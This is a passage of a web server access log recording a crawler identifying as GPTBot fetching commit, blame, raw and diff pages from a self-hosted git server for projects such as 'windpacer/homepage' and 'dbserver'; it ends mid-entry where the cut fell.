"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 10592] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" -[17/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 7498] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 14653] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=nginx.conf" [Client 74.7.227.38] [Length 18907] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 14620] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10862] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" -[17/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d.patch" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 12738] [Gzip 6.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 12442] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" -[17/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 11301] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426.diff" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14649] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 14562] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 14530] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81792] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" -[17/Feb/2026:13:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" -[17/Feb/2026:13:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:13:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" -[17/Feb/2026:13:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 10947] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" -[17/Feb/2026:13:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" -[17/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" -[17/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" -[17/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" -[17/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 10950] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" -[17/Feb/2026:13:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 131072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" -[17/Feb/2026:13:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10863] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" -[17/Feb/2026:13:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" -[17/Feb/2026:13:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 14804] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 10060] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea.patch" [Client 74.7.227.38] [Length 2311] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:13:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 14557] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:13:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" -[17/Feb/2026:13:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" -[17/Feb/2026:13:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" -[17/Feb/2026:13:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" -[17/Feb/2026:13:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" -[17/Feb/2026:13:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" -[17/Feb/2026:13:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14651] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" -[17/Feb/2026:13:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 14653] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" -[17/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/branches" [Client 74.7.227.38] [Length 10322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 23722] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" [Client 74.7.227.38] [Length 9866] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:17:11 +0000] - 200 200 - GET https 